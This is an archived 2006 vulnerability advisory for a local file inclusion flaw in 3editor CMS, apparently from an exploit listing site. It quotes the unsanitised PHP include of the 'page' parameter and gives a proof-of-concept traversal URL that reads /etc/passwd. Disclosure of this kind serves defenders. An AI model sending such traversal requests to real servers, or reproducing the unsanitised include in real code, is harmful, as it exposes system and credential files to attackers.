3editor CMS <= 0.42 (index.php) Local File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : 3editor CMS <= 0.42 (index.php) Local File Include Vulnerability
# Published : 2006-12-22
# Author : 3l3ctric-Cracker
# Previous Title : EternalMart Guestbook 1.10 (admin/auth.php) Remote Inclusion Vuln
# Next Title : Php/Mysql Site Builder 0.0.2 (htm2php.php) File Disclosure Vulnerability

************************************************************************     
*script Name: 3editor CMS (index.php) Local File Include Exploit       *
*Download:http://www.matteolucarelli.net/3editor/index.htm             *
*[Author      : Dr Max Virus                                           *
*[Contact     :drmaxvirus@w.cn                                         *
************************************************************************
*Bug & Problem                                                         *
*In file index.php Let's Take a look;                                  *
*if (!isset($_GET['page'])) include('phplib/treeedit.php');            *
*else include('phplib/'.$_GET['page']);                                *
************************************************************************
*As We can see the variable of page is not sanitized So attacker can   *
*apply his bug when:                                                   *
*register_globals=on                                                   *
************************************************************************
*POC Example:                                                          *
*http://[target]/[path]/index.php?page=../../../../../etc/passwd       *
************************************************************************
*Thx:str0ke -koray -ajann -Timq -r0ut3r -All my Friends                *
*special gr33ts:AsianEagle -The master -Kacper -Hotturk                *
************************************************************************

# www.Syue.com [2006-12-22]